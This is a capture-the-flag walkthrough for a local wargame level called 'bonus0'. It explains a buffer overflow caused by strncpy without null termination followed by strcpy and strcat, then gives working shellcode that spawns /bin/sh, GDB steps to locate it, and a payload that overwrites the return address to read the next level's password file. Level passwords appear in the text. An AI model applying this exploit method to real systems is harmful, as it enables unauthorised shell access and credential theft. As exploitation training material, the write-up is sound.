1. Download the binary from the server:
   scp -P 2222 bonus0@localhost:~/bonus0 .
   Password: f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728

2. Analyze the binary with Ghidra:
   - p() uses strncpy(dest, src, 20) which doesn't null-terminate if source >= 20 bytes
   - pp() has adjacent 20-byte buffers (first_input, second_input)
   - pp() uses strcpy() which expects null-terminated strings
   - Overflow: 20 + 20 + 1 (space) + 20 (strcat) = 61 bytes into 54-byte buffer
   - 7-byte overflow allows return address overwrite

3. Connect to the VM via SSH:
   ssh bonus0@localhost -p 2222
   Password: f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728

4. Find shellcode address and craft exploit:
   Export shellcode with NOP sled:
   export SHELLCODE=$(python -c 'print "\x90"*200 + "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
   
   Find address using GDB:
   gdb ./bonus0
   (gdb) run
   AAAAAAAAAAAAAAAAAAAA
   BBBBBBBBBBBBBBBBBBBB
   (gdb) x/500s $esp
   
   Look for: 0xbffffd45: "SHELLCODE=\220\220..."
   Calculate: 0xbffffd45 + 0xa (skip "SHELLCODE=") = 0xbffffd4f
   Use safe address in NOP sled: 0xbffffd55
   
   Payload structure:
   - Input 1: 20 bytes (no null terminator)
   - Input 2: 9 bytes padding + 0xbffffd55 (shellcode addr) + 7 bytes overflow

5. Execute the exploit:
   (python -c 'print "A"*20'; python -c 'print "B"*9 + "\x55\xfd\xff\xbf" + "C"*7'; cat) | ./bonus0

6. Read the password:
   cat /home/user/bonus1/.pass
   
   Password: cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9

7. Exit and login as bonus1:
   su bonus1
   Password: cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
